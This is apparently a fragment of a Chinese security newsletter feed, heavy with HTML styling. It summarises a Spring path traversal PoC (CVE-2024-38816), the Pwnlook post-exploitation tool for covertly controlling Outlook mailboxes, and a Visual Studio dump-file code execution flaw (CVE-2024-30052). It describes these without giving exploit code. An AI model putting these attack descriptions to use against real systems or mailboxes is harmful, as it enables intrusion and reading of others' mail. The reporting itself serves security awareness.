padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞验证: 通过 Docker 环境中的 Spring Boot 应用程序，演示了 CVE-2024-38816 漏洞的验证过程，包括构建镜像、运行容器、执行 PoC 命令，并通过文件内容的显示来确认漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">修复和问题: 漏洞在 Spring Framework 6.1.13 版本中得到了修复。分析显示，漏洞可能与新增符号链接选项和修改了处理 %-编码字符的代码的两个问题有关。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击条件: 成功利用漏洞的攻击可能需要满足特定的功能使用、符号链接存在以及 %-编码字符的使用等条件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">教育和研究用途: PoC 旨在教育和安全研究目的，强调在实际系统中使用之前确保漏洞已修复且有适当授权，并对滥用代码不承担责任。</section></li></ul>
	<br/>
	<p>🏷️: CVE, Spring Boot, 路径遍历, PoC, Docker</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x15
			 Pwnlook：一款控制Outlook应用的攻击后利用工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Pwnlook 是一款针对 Outlook 桌面应用程序的后期利用工具，能够提供对邮箱的完整控制，包括列出邮箱、文件夹、邮件信息，读取邮件、搜索邮件以及下载附件等功能。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=bb305e0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu264A1ru9TzCFE654NKpvcqicQhhsGR1ywxbqL57seX4Y1U3Ch3Qk3Mw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Pwnlook: 攻击者可完全控制Outlook桌面应用</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">pwnlook: 攻击后利用工具，完全控制 Outlook 桌面应用</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuefmGO0BJIcxsSDxEo9zBI2roxYriaxAcdlZfcXOEYqTrQ2LSLxV2WSw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuefmGO0BJIcxsSDxEo9zBI2roxYriaxAcdlZfcXOEYqTrQ2LSLxV2WSw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525451441151882"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Pwnlook 是一个专门针对 Outlook 桌面应用程序的后期利用工具，它能够提供对配置在其中的电子邮件的完整控制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的功能包括但不限于列出邮箱、文件夹、邮件信息，读取邮件、搜索邮件以及下载附件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Pwnlook 使用 .NET 4.8.1 编写，需要在编译时注册 DLL 文件，但在执行时不需要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过使用 Redemption 库和 COM，Pwnlook 能够在不触发用户警报的情况下收集信息。</section></li></ul>
	<br/>
	<p>🏷️: 攻击后利用, Outlook, 邮件控制, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x16
			 利用Visual Studio转储文件的CVE-2024-30052漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了 CVE-2024-30052 漏洞，该漏洞允许在 Visual Studio 调试内存转储文件时执行任意代码，攻击者可以通过嵌入恶意源代码文件到 PDB 文件中，利用 Visual Studio 对特定扩展名文件的默认处理行为来实现代码执行。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.8494271685761048" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="611" src="https://wechat2rss.xlab.app/img-proxy/?k=8d75b99f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuLk4DRbfoeWnib5XP7mo55N34ym9dZ875vbf2CIT51rCqgVMlYicRncGw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4266304347826087" data-w="368" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=9c15170c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuCBMVxUKqfq09Sn1VJibkvPJzZzwiaBwt4cMr5uDN0tNhwT1C6odC56rg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1.0905797101449275" data-w="276" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=171b8bd3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuRmOZeJaPvZ6ep47WIuv8fOVyQjq6vks9wjnXpWz2vz7m248MuRhGiaw%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Visual Studio 漏洞 CVE-2024-30052 允许通过转储文件进行利用</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Visual Studio 漏洞 CVE-2024-30052 利用：通过转储文件攻击</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuO3EbFkbZHFrrgicqILMibZQx0nMr5ukFxLpZzKnicM83eT7woEL7hrEaA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuO3EbFkbZHFrrgicqILMibZQx0nMr5ukFxLpZzKnicM83eT7woEL7hrEaA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858284224422242"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Visual Studio 在处理内存转储文件时，对于嵌入式 PDB 文件中的源代码文件没有进行充分的安全检查，这可能导致任意代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过将恶意代码嵌入到 PDB 文件中的源代码文件中，并利用 Visual Studio 对特定文件扩展名的处理行为，来实现代码执行。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软最初低估了这个漏洞的严重性，但后来认识到了其潜在的危险，并进行了修复。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这个漏洞的存在强调了开发者在处理来自不可信来源的内存转储文件时需要保持警惕的重要性。</section></li></ul>
	<br/>
	<p>🏷️: CVE-2024-30052, Visual Studio, 漏洞利用, 代码执行, 调试</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.6096774193548387" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=91da8736&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg86C3EVW7ZBOD533reH1QnsMrQpNICvlegQ9GQz0uVvc9WnJvFe5mZg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487728">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2da19996&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487728%26idx%3D1%26sn%3Dc5bab130b8939748b305e97018968ca2%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 10 Oct 2024 11:28:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0819 | Chrome、Zabbix等漏洞、红队工具更新</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487718&amp;idx=1&amp;sn=621ea5c2e0d12c57bf23b830a0e0a842</link>
      <description>本期安全早报涵盖Chrome、Zabbix等多个软件漏洞，并介绍了红队工具更新，如Lil Pwny 3.2.0和BounceBack。同时，深度解析了CVE-2024-38148等漏洞，帮助您及时了解最新安全威胁和防御措施</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-08-19 17:32</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>本期安全早报涵盖Chrome、Zabbix等多个软件漏洞，并介绍了红队工具更新，如Lil Pwny 3.2.0和BounceBack。同时，深度解析了CVE-2024-38148等漏洞，帮助您及时了解最新安全威胁和防御措施</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f31c0146&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgribrRFgo2QuBm71QE2LbsGCv8Qqgysy35lMib2vFKEqj9bDesb65LCpQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


